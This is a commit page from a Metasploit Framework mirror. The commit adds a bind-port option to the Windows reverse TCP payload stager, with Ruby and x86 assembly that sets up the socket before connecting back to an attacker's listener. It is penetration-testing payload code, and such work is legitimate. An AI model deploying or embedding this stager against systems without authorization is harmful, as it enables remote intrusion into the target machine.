infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9335, Added socket bind port option for reverse tcp payload. 

Merge branch 'land-9335' into upstream-master
4.x 4.16.33
bwatters-r7 2018-01-24 11:50:10 -06:00 committed by Jeffrey Martin
parent b515a582f0
commit af0c58c2ae
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
1 changed files with 40 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
lib/msf/core/payload/windows/reverse_tcp.rb
View File

@ -22,6 +22,14 @@ module Payload::Windows::ReverseTcp
include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk include Msf::Payload::Windows::Exitfunk
#
# Register reverse tcp specific options
#
def initialize(*args)
super
register_advanced_options([ OptString.new('PayloadBindPort', [false, 'Port to bind reverse tcp socket to on target system.']) ], self.class)
end
# #
# Generate the first stage # Generate the first stage
# #
@ -31,6 +39,7 @@ module Payload::Windows::ReverseTcp
port: ds['LPORT'], port: ds['LPORT'],
host: ds['LHOST'], host: ds['LHOST'],
retry_count: ds['ReverseConnectRetries'], retry_count: ds['ReverseConnectRetries'],
bind_port: ds['PayloadBindPort'],
reliable: false reliable: false
} }
@ -103,6 +112,9 @@ module Payload::Windows::ReverseTcp
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
addr_fam = 2
sockaddr_size = 16
asm = %Q^ asm = %Q^
; Input: EBP must be the address of 'api_call'. ; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server ; Output: EDI will be the socket for the connection to the server
@ -141,7 +153,35 @@ module Payload::Windows::ReverseTcp
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this xchg edi, eax ; save the socket for later, don't care about the value of eax after this
^
# Check if a bind port was specified
if opts[:bind_port]
bind_port = opts[:bind_port]
encoded_bind_port = "0x%.8x" % [bind_port.to_i,2].pack("vn").unpack("N").first
asm << %Q^
xor eax, eax
push 11
pop ecx
push_0_loop:
push eax ; if we succeed, eax will be zero, push it enough times
; to cater for both IPv4 and IPv6
loop push_0_loop
; bind to 0.0.0.0/[::], pushed above
push #{encoded_bind_port} ; family AF_INET and port number
mov esi, esp ; save a pointer to sockaddr_in struct
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
push #{encoded_host} ; host in little-endian format
push #{encoded_port} ; family AF_INET and port number
mov esi, esp
^
end
asm << %Q^
try_connect: try_connect:
push 16 ; length of the sockaddr struct push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct push esi ; pointer to the sockaddr struct